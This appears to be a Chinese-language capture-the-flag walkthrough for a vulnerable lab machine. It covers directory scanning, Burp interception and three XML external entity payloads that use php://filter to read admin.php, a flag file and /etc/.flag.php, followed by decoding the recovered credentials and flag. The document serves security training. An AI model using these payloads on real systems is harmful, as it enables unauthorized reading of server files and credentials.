步骤一:搜索靶机地址

步骤二:利用dirsearsh扫描目录

步骤三:进入靶机

进入robots.txt

步骤四:访问/xxe

步骤五:输入用户名密码,利用burp抓包,传送至重放器

输入:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>admin</password></root>

进行base64解码有用户名密码

密码进行md5解密

步骤六:进入/xxe/admin.php输入用户名:administhebest 密码:admin@123

点击Flag

进入新目录

读取目录:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>

进行base64解码

得出Flag进行base32解码

得出结果进行base64解码

步骤七:读取目录
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>

进行base64解码

步骤八:在www目录下添加php文件

访问本机php文件,得出结果

